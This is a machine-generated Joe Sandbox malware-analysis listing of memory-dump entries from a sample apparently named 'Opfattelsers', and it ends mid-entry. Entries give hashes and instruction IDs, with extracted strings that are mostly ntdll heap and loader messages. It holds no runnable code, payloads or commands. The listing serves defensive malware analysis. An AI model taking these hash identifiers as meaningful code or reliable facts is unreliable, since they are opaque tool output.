                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                            • API String ID: 0-3393094623
                                                                            • Opcode ID: 572ac8025370f357f892471bd3345a1b8ddf78eda0b7770d4e821e3fe1848e5a
                                                                            • Instruction ID: 65abb6ba15308475c1e9d4f91f0235947b3d37f76853d8d15d696805d2ee2f03
                                                                            • Opcode Fuzzy Hash: 572ac8025370f357f892471bd3345a1b8ddf78eda0b7770d4e821e3fe1848e5a
                                                                            • Instruction Fuzzy Hash: 26026F71908385CFD720DF64C484B9BB7F5BF8A704F41891EE8AA9B250E774E844CB92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: df12e1f8a4db58fea8d929d568faaa5da7b134c7b315181f94d86a408d42b67b
                                                                            • Instruction ID: c0956166ce05f3c9adfc130f8880e465a489314a351696517b24a6943b52d89e
                                                                            • Opcode Fuzzy Hash: df12e1f8a4db58fea8d929d568faaa5da7b134c7b315181f94d86a408d42b67b
                                                                            • Instruction Fuzzy Hash: 58F10672E002158BCB0CCFA9C8907BEBBF6AF8821071A426DD556DF385EA34E940CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                            • API String ID: 0-3082644519
                                                                            • Opcode ID: 77ce6a5d90278f1a7f18bdad3db88b4f187cb2615f85c08104902dbe5b2c7d2f
                                                                            • Instruction ID: d6897d5d55c7b6cdf901d80edde6be5a789eeadba106652696994aa44f14685c
                                                                            • Opcode Fuzzy Hash: 77ce6a5d90278f1a7f18bdad3db88b4f187cb2615f85c08104902dbe5b2c7d2f
                                                                            • Instruction Fuzzy Hash: A9418576B012286FCB21CB64DC48BDABBBCAF46314F4541D5E449AB241EE34AE85CF91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                            • API String ID: 0-1155200129
                                                                            • Opcode ID: 31f5aa0c3e77630758886952a68650a2b0afaa074685cb9efee2a191e21fd334
                                                                            • Instruction ID: f60f5f9dc0b1660a3608510dfc0156c33e0afa2e0c0e4b2c28753931e226e7ea
                                                                            • Opcode Fuzzy Hash: 31f5aa0c3e77630758886952a68650a2b0afaa074685cb9efee2a191e21fd334
                                                                            • Instruction Fuzzy Hash: AA31CF75125B85DFC705AB28EDD8F2573E4FB85B30F55C019E8014F661DA3ABC91CA10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: eb831a910a69b2517c3901b4c2ffc9685b50aa5ce56ffac543fd3a142c63870b
                                                                            • Instruction ID: 98cc4a6f8fb9156084d8690b8611f91b89169a0d213d0e51711f4ccccf8642fd
                                                                            • Opcode Fuzzy Hash: eb831a910a69b2517c3901b4c2ffc9685b50aa5ce56ffac543fd3a142c63870b
                                                                            • Instruction Fuzzy Hash: 92326A70D0426ADFDB25CF64C988BDDBBB0BF48304F0542E9D559AB241E776AA84CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$.mui$.mun$SystemResources\
                                                                            • API String ID: 0-3047833772
                                                                            • Opcode ID: 353f5f8ba23a0bba93855e8581019b912ea33fa9f8240201d0aa366b3831ff52
                                                                            • Instruction ID: ebec4d1e34db582e75aac2998609ea6cc891af3cd067016f41bc80c85fc42ea0
                                                                            • Opcode Fuzzy Hash: 353f5f8ba23a0bba93855e8581019b912ea33fa9f8240201d0aa366b3831ff52
                                                                            • Instruction Fuzzy Hash: 11624176A007699FCB21CF54CC44BDAB7B8BF0A314F4546E9E409A7A50E731AE81CF52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: c43b1ddfb195533b9c985a7a824bd242d90390ace76a6d877fafb61b6a870383
                                                                            • Instruction ID: 2bbbf247ec45b6f394da09687375527566f0560aee8d16a96ba93d72edc77a90
                                                                            • Opcode Fuzzy Hash: c43b1ddfb195533b9c985a7a824bd242d90390ace76a6d877fafb61b6a870383
                                                                            • Instruction Fuzzy Hash: A7E29F74A00255DFDB15CF68C890BAABBF1FF4A304F1482ADE849AB395D735B845CB90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                            • API String ID: 0-2586055223
                                                                            • Opcode ID: 3d87328a4e08ad2086cb3d21fa68d024357e160dae35da9a4802ebb04d6595a9
                                                                            • Instruction ID: d32127927e7f9451e197d2bcf30a9f40e2f0fd8113aadd88ac5dc4a4aa3d9421
                                                                            • Opcode Fuzzy Hash: 3d87328a4e08ad2086cb3d21fa68d024357e160dae35da9a4802ebb04d6595a9
                                                                            • Instruction Fuzzy Hash: A661E076204781AFD311CB68EC48FA677E9FF84B24F040969F9648B3A1D734E941CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                            • API String ID: 0-1880532218
                                                                            • Opcode ID: 16803c09f960b8b1456b3ed061fe358ee5dfc63115d99ee03e754246027e3f92
                                                                            • Instruction ID: 5098345077ff53c19194e86fe2968d570a4613049565e2e3eb6249415680c926
                                                                            • Opcode Fuzzy Hash: 16803c09f960b8b1456b3ed061fe358ee5dfc63115d99ee03e754246027e3f92
                                                                            • Instruction Fuzzy Hash: A021083AE40A44AFC705CB589C52AD9B7F49F44604F6A406BE846AF341FB34F941C750
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                            • API String ID: 0-4256168463
                                                                            • Opcode ID: 781fa62706df0c553743c1a05b66597c7d863eb8b7482a230865dde7cc5c8b62
                                                                            • Instruction ID: 5124174d1ff1c4802bb23a35a7bd24d7f251461f724b94b29398fedecd964853
                                                                            • Opcode Fuzzy Hash: 781fa62706df0c553743c1a05b66597c7d863eb8b7482a230865dde7cc5c8b62
                                                                            • Instruction Fuzzy Hash: 2001D236120748DFCB15DB78E848BD673EAFF46670F24455AE4019F250EA34FD46C694
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a87999062a6eaa03425040c7205fd74ddd3a15f99ad39125b7c2be097a105cdd
                                                                            • Instruction ID: 19c84a9ebbd6f7d2954b88a438609fd4026b78dc028f12fcd34f1e40e736719b
                                                                            • Opcode Fuzzy Hash: a87999062a6eaa03425040c7205fd74ddd3a15f99ad39125b7c2be097a105cdd
                                                                            • Instruction Fuzzy Hash: B1517F35600656AFDB09CF64C885B9EBBB5FF88310F144265E9159B790DB30BD20CB91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 73dbc67363915c08c7b8e8744bb2097cc62869f2dbca942e20c16c543986e679
                                                                            • Instruction ID: 801fe525065fbf3db7ffd19eef002396719d26af096e1f321035b725ac1f8ab7
                                                                            • Opcode Fuzzy Hash: 73dbc67363915c08c7b8e8744bb2097cc62869f2dbca942e20c16c543986e679
                                                                            • Instruction Fuzzy Hash: 8531D575E1021ACBCF04DFA9C484ADDFBB5BF88710F25812AE812B7290D736A941CF60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 047ba3e2a4ab5feb0dedaa4367e765d77e42544c9b9c9c811b5c710fa02aa138
                                                                            • Instruction ID: 64a219b1206646092631688b395fa3618b72bf5381234de67ed810bb3c02467c
                                                                            • Opcode Fuzzy Hash: 047ba3e2a4ab5feb0dedaa4367e765d77e42544c9b9c9c811b5c710fa02aa138
                                                                            • Instruction Fuzzy Hash: DD220170A00246DFEB05DF28C894BAABBF5FF46714F648599E8458F381E735E881CB60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                            • API String ID: 0-1168191160
                                                                            • Opcode ID: 0bad74a2825c602249a0b264450803c31042f7f0a3b8d71cb79ed139723df2e9
                                                                            • Instruction ID: 50fb1baf2403371ff26fdbbceb3277c9d929de640c0c8e7180ccd27d47c9c8f6
                                                                            • Opcode Fuzzy Hash: 0bad74a2825c602249a0b264450803c31042f7f0a3b8d71cb79ed139723df2e9
                                                                            • Instruction Fuzzy Hash: DCF180B5E002298BCB64CF58CC90BD9B3B5AF44301F4541E9D649AB360E775EE81CF95
                                                                            Strings
                                                                            • {, xrefs: 1F803ABD
                                                                            • LdrpLoadResourceFromAlternativeModule, xrefs: 1F803AAF
                                                                            • 'LDR: %s(), invalid image format of MUI file , xrefs: 1F803AB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                            • API String ID: 0-1697150599
                                                                            • Opcode ID: 8912fa4190bfe8e4214655c38d480cde1b1ed5c8bafe72fd9b6995feb0d3d059
                                                                            • Instruction ID: 15f821aea88c175cbc49cce29480d1b5a6c16f9cef6b8820f909b86e7818e70e
                                                                            • Opcode Fuzzy Hash: 8912fa4190bfe8e4214655c38d480cde1b1ed5c8bafe72fd9b6995feb0d3d059
                                                                            • Instruction Fuzzy Hash: 79E17B316083868BD718CF28C590B6BB7E1BF84744F4A4E2DF9858B350E772E945CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                            • API String ID: 0-2391371766
                                                                            • Opcode ID: b28fc16eb785a7fa14f212cf51554f986ac13431a46783dbc4b79ed0e278e46b
                                                                            • Instruction ID: a800f3c01829bae3f244174a4c4a4b677512fa08f02d950a243056e2c73b5e29
                                                                            • Opcode Fuzzy Hash: b28fc16eb785a7fa14f212cf51554f986ac13431a46783dbc4b79ed0e278e46b
                                                                            • Instruction Fuzzy Hash: F4B1ADB1A04745AFE311CF54C895F5BB7E8BB44714F81092AFA41AF290E772F884CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                            • API String ID: 0-1146358195
                                                                            • Opcode ID: fc6c9ccd1d7cd0833ca75c679708cf4ebec85d09648640caedb8c14235afab27
                                                                            • Instruction ID: 673c45bc43d3c199659bc09a027ed04d4293365edd3e59360e2f0ce90d82bcc6
                                                                            • Opcode Fuzzy Hash: fc6c9ccd1d7cd0833ca75c679708cf4ebec85d09648640caedb8c14235afab27
                                                                            • Instruction Fuzzy Hash: 21A1BF71A093599FD315CF24D884B5BBBE8BF88B54F11092DF984AB250E734ED04CB92
                                                                            Strings
                                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 1F87B82A
                                                                            • TargetNtPath, xrefs: 1F87B82F
                                                                            • GlobalizationUserSettings, xrefs: 1F87B834
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                            • API String ID: 0-505981995
                                                                            • Opcode ID: 4e9257e185a132e4c7adcb535c1bfe76c38ef1b9ece2ebb358b5c1ab42fd92f5
                                                                            • Instruction ID: 0365ca1188bfd442756bb47a2a85e1cb75cfa72036f2d97b117152c6fe814d0c
                                                                            • Opcode Fuzzy Hash: 4e9257e185a132e4c7adcb535c1bfe76c38ef1b9ece2ebb358b5c1ab42fd92f5
                                                                            • Instruction Fuzzy Hash: E4618572D01229ABDB21DF54DC8CBDAB7B5AF54754F0502E5E508AB254EB34EE80CF90
                                                                            Strings
                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 1F7FE6C6
                                                                            • HEAP: , xrefs: 1F7FE6B3
                                                                            • HEAP[%wZ]: , xrefs: 1F7FE6A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                            • API String ID: 0-1340214556
                                                                            • Opcode ID: 9a6b30146016536089d55285e1bc5217b3b09fb26be298b4f26b87ce228ca9fc
                                                                            • Instruction ID: 08f4b958623a507fea592474c5eeba8dce640986f93c33ce00f68c9c38559e41
                                                                            • Opcode Fuzzy Hash: 9a6b30146016536089d55285e1bc5217b3b09fb26be298b4f26b87ce228ca9fc
                                                                            • Instruction Fuzzy Hash: FA51E035600685EFD312CBA8E898F9ABBF8FF05720F0405A4E5918B392E734F951DB50
                                                                            Strings
                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1F84DC32
                                                                            • HEAP: , xrefs: 1F84DC1F
                                                                            • HEAP[%wZ]: , xrefs: 1F84DC12
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                            • API String ID: 0-3815128232
                                                                            • Opcode ID: f3a24f45a5bff1c02e470bfd25c747d87c6b3b922a6f515ab228213b14bb121c
                                                                            • Instruction ID: 9f8c8d65d201f40d01a1b4971399b3e64a3b678be31a7d7325d9c9d8c35ab659
                                                                            • Opcode Fuzzy Hash: f3a24f45a5bff1c02e470bfd25c747d87c6b3b922a6f515ab228213b14bb121c
                                                                            • Instruction Fuzzy Hash: 3951393711025CCAD758CF29C8A47B273E1EF45354F60884AE4C28FA81E276E847DB21
                                                                            Strings
                                                                            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1F7FFB63
                                                                            • HEAP: , xrefs: 1F7FFB58
                                                                            • HEAP[%wZ]: , xrefs: 1F7FFB4B
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                            • API String ID: 0-1596344177
                                                                            • Opcode ID: 990e80598625b2675549f8f33299a8debd638f26dc7f05505a0e999338fc1dfc
                                                                            • Instruction ID: 59cfbbd0e8a0a329051f7fb806ede45a77142de1cf6cdae198e28a3424aba5e3
                                                                            • Opcode Fuzzy Hash: 990e80598625b2675549f8f33299a8debd638f26dc7f05505a0e999338fc1dfc
                                                                            • Instruction Fuzzy Hash: D251A031A14155DFDB04CF68D484AA9BBB1FF45360F5A8299D8149F242E772FD42CF90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 7674f3909f69645cf4b0d4b6d671c78bf86e6eff04272c442dff380a840da64c
                                                                            • Instruction ID: 34d81e54d95780661df2028c4a36d892e2e5533cb250167123c89f34d7974ebd
                                                                            • Opcode Fuzzy Hash: 7674f3909f69645cf4b0d4b6d671c78bf86e6eff04272c442dff380a840da64c
                                                                            • Instruction Fuzzy Hash: 8431CD35201B06EFC7459F64CE84E8AFBA5FF88314F451225E9059BA50DB72F821CBD0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 3f7eac3fe077d4cf5999324592b7d672f0daf77d2941c04e62e6a26ca2c0521b
